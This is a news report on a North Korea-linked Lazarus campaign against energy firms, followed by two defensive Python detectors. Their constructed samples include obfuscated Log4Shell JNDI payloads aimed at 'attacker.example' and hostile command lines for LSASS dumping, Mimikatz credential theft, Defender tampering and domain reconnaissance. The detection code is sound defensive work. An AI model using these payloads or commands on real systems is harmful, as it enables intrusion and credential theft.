A malicious campaign mounted by the North Korea-linked Lazarus Group targeted energy suppliers around the world, including those based in the United States, Canada and Japan, between February and July 2022.
“The campaign is intended to infiltrate organizations around the world to establish long-term access and then exfiltrate data of interest to the adversary’s nation-state,” Cisco Talos said in a report shared with The Hacker News.
Some elements of the espionage attacks had already entered the public domain, thanks to earlier reports from Broadcom-owned Symantec and AhnLab in April and May. Symantec attributed the operation to a group it tracks as Stonefly, a subgroup of Lazarus better known as Andariel, Guardian of Peace, Operation Troy, and Silent Chollima.
While those earlier attacks led to the deployment of the Preft (aka Dtrack) and NukeSped (aka Manuscrypt) implants, the latest wave stands out for its use of two other malware families: VSingle, an HTTP bot that executes arbitrary code retrieved from a remote server, and a Golang backdoor called YamaBot.
The campaign also uses a new remote access Trojan called MagicRAT, which has capabilities to evade detection and launch additional payloads on infected systems.
“Although the same tactics were applied in both attacks, the resulting malicious implants deployed are distinct from each other, indicating the wide variety of available implants at Lazarus’s disposal,” said researchers Jung soo An, Asheer Malhotra and Vitor Ventura.
Initial access to corporate networks is gained by exploiting vulnerabilities in VMware products (e.g., Log4Shell), with the ultimate goal of establishing persistent access to carry out activities in support of North Korean government objectives.
Using VSingle in the attack chain allows the threat actor to perform a variety of activities such as reconnaissance, exfiltration, and manual backdooring, giving the operators a solid understanding of the victim's environment.
Other tactics adopted by the group, besides the use of bespoke malware, include harvesting credentials with tools such as Mimikatz and Procdump, disabling antivirus components, enumerating Active Directory services, and even taking steps to clean up their tracks after activating backdoors on the endpoint.
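Because the report names Log4Shell as the initial-access vector against VMware products, the first thing a defender usually wants is a way to spot JNDI lookup probes in web access logs, including the nested-lookup tricks (`${lower:j}`, `${::-j}`, `${env:UNSET:-j}`) attackers use to dodge naive `${jndi:` string matching. The following is an added example written for this page, not code from Cisco Talos or any VMware product; the log lines are constructed, and the assumption is that you have request URIs (or headers) from an access log to feed into `scan()`.

```python
import re

# Matches an innermost ${...} lookup: a body with no further "${" or "}" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve(m):
    """Collapse the obfuscating lookups Log4j would evaluate before reaching ${jndi:...}.

    ${::-x} -> x, ${lower:X} -> x, ${upper:x} -> X, ${env:UNSET:-x} -> x.
    Anything else (including ${jndi:...} itself) is left untouched.
    """
    body = m.group(1)
    if body.startswith("::-"):
        return body[3:]
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    if ":-" in body and not body.lower().startswith("jndi:"):
        return body.split(":-", 1)[1]
    return m.group(0)


def normalize(s, max_rounds=20):
    """Repeatedly resolve innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, s)
        if new == s:
            break
        s = new
    return s


def is_log4shell_probe(line):
    """True if the line contains a JNDI lookup after de-obfuscation (case-insensitive)."""
    return "${jndi:" in normalize(line).lower()


def scan(lines):
    """Return the 0-based indices of lines that look like Log4Shell probes."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed sample access-log request lines (not real traffic from the campaign).
SAMPLE_LOG = [
    'GET /index.html HTTP/1.1',
    'GET /search?q=${date:yyyy-MM-dd} HTTP/1.1',
    'GET /?x=${jndi:ldap://attacker.example/a} HTTP/1.1',
    'GET /?x=${${lower:j}ndi:${lower:ldap}://attacker.example/a} HTTP/1.1',
    'GET /?x=${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a} HTTP/1.1',
    'GET /?x=${${env:NONEXIST:-j}ndi:${upper:ldap}://attacker.example/a} HTTP/1.1',
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LOG):
        print(f"line {i}: {SAMPLE_LOG[i]} -> {normalize(SAMPLE_LOG[i])}")
```

The benign `${date:...}` line is left alone because only known obfuscation forms are rewritten; a real deployment should also run the same normalization over User-Agent and other headers, since Log4j evaluates lookups wherever the value ends up being logged.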
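The post-exploitation tradecraft listed above (Procdump against LSASS, Mimikatz, tampering with antivirus, Active Directory enumeration) is all visible in process-creation telemetry, and the useful detection lesson is to match on command-line semantics rather than binary names, because the tools are routinely renamed. The following is an added example for this page, not Talos's detection content; the events are constructed to resemble Sysmon Event ID 1 / EDR process records, and the rule names and sample commands are illustrative assumptions, not indicators from the report.

```python
import re

# Constructed sample process-creation events (not real telemetry from the campaign).
# Note the renamed binaries: pd64.exe is Procdump, m.exe is Mimikatz.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"id": 2, "image": r"C:\Temp\pd64.exe",
     "cmdline": r"pd64.exe -accepteula -ma lsass.exe C:\Temp\ls.dmp"},
    {"id": 3, "image": r"C:\Temp\m.exe",
     "cmdline": '"m.exe" "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"id": 4, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"id": 5, "image": r"C:\Windows\System32\net.exe",
     "cmdline": 'net group "Domain Admins" /domain'},
    {"id": 6, "image": r"C:\Windows\System32\nltest.exe",
     "cmdline": "nltest /dclist:corp.local"},
    {"id": 7, "image": r"C:\Program Files\Git\git.exe",
     "cmdline": "git status"},
]

# Each rule keys on what the command does, not on the executable's name.
RULES = [
    # Procdump-style full memory dump (-ma / -mp) of lsass, whatever the binary is called.
    ("credential_access/lsass_dump",
     re.compile(r"\s-m[ap]\b.*\blsass(\.exe)?\b", re.I)),
    # Mimikatz module syntax survives renaming the executable.
    ("credential_access/mimikatz",
     re.compile(r"\b(sekurlsa|lsadump|kerberos)::", re.I)),
    # Disabling Defender features through Set-MpPreference.
    ("defense_evasion/av_tamper",
     re.compile(r"Set-MpPreference\b.*-Disable\w*", re.I)),
    # Common built-in Active Directory enumeration commands.
    ("discovery/ad_recon",
     re.compile(r"(\bnet\s+group\b.*/domain\b)|(\bnltest\b.*/dclist)|(\bdsquery\b)", re.I)),
]


def classify(event):
    """Return the names of every rule whose pattern matches this event's command line."""
    return [name for name, pat in RULES if pat.search(event["cmdline"])]


def triage(events):
    """Map event id -> matched rule names, keeping only events that hit at least one rule."""
    hits = {}
    for ev in events:
        tags = classify(ev)
        if tags:
            hits[ev["id"]] = tags
    return hits


if __name__ == "__main__":
    for event_id, tags in triage(SAMPLE_EVENTS).items():
        print(event_id, tags)
```

Events 2 and 3 are caught even though neither image name mentions Procdump or Mimikatz; an image-name rule would have missed both. In practice these rules would be scoped further (parent process, signer, user) to keep the noise from administrators running `net group` legitimately.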